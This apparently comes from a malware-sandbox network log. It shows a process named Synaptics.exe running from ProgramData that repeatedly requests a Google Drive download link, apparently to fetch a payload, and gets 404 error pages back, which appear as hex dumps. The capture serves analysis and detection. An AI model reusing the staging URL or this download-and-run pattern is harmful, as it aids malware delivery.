                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC59OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC62INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC64INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 6a 79 65 73 74 52 65 4b 44 55 48 6b 34 6d 62 4d 31 46 5a 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JjyestReKDUHk4mbM1FZow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC65INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC65INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          21192.168.2.349765172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC65OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC65INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC67INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC67INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 65 57 4d 6f 47 42 2d 2d 5f 4b 41 65 6f 70 55 33 33 62 6f 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LeWMoGB--_KAeopU33bojw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC68INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC68INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          22192.168.2.349766172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC65OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC68INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC70INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC70INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 5a 5a 55 73 66 4b 56 78 63 46 2d 4b 74 56 4e 77 51 39 2d 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jZZUsfKVxcF-KtVNwQ9-lQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC71INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC71INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          23192.168.2.349767172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC68OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC71INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC73INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 33 49 47 6a 47 4e 4d 75 49 35 41 54 30 32 31 48 64 52 71 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X3IGjGNMuI5AT021HdRqHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC74INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC74INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          24192.168.2.349768172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC74OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC75INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC76INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC76INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 32 51 43 6d 4c 6b 42 61 35 55 4d 56 62 42 77 32 5f 33 6e 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC77INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC78INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          25192.168.2.349769172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC75OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
